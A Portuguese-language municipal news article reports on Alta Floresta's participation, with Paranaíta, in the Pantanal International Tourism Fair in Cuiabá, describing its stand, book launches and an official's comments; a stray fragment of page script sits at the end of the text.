Capa / Cidades / Alta Floresta participa da Feira Internacional de Turismo do Pantanal

Alta Floresta participa da Feira Internacional de Turismo do Pantanal

Alta Floresta participa da Feira Internacional de Turismo do PantanalAssessoria PMAF

A prefeitura de Alta Floresta por meio da Secretaria Municipal de Indústria, Comercio e Turismo, em parceria com a prefeitura municipal de Paranaíta, estiveram participando da Feira Internacional de Turismo do Pantanal, realizada em Cuiabá dos dias 20 a 24 de abril. O evento tem como objetivo divulgar os produtos turísticos do estado, bem como negócios, gastronomia e artesanatos.
A programação contou com encontros, fóruns, reuniões e diversas palestras, dentre elas a palestra magma, “Caminhos do Setor do Turismo Diante do Atual Cenário Econômico Nacional e Internacional, ministrada por Caio Luiz de Carvalho, diretor geral do Grupo Bandeirantes de Comunicação e ex Ministro de Turismo.
A parceria entre Alta Floresta e Paranaíta é continuidade do “Grupo Gestor de Turismo” no qual definiram a nossa região como Amazônia mato-grossense, o município contou com a participação das pousadas Portal da Amazônia e Cristalino Lodge e também dos alunos do Instituto Federal de Mato Grosso (IFMT) do curso de turismo. No Stand teve dois seguimentos sendo a observação de aves e pesca, e também com a venda de castanha, na ocasião foram lançados os livros sobre Aves da Vitória da Riva e o do Festival Gastronômico do SEBRAE com parcerias das usinas CHTP e São Manoel.
A técnica representante da secretaria de Indústria, Comercio e Turismo, Célia Castro, disse que, a feira teve um grande público e a presença de quatro países, apresentações culturais, palestras, rodada de negócio, gastronomia do Mato Grosso e artesanato. Segundo Célia Castro, o stand de Alta Floresta foi muito visitado, para o setor dá uma visibilidade muito grande para Alta Floresta, inclusive foram convidados pelo SEBRAE para ir a São Paulo, mostrar a parte de culinária por conta do livro do Festival de Gastronomia, como também para falar do potencial da região.document.currentScript.parentNode.insertBefore(s, document.currentScript);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top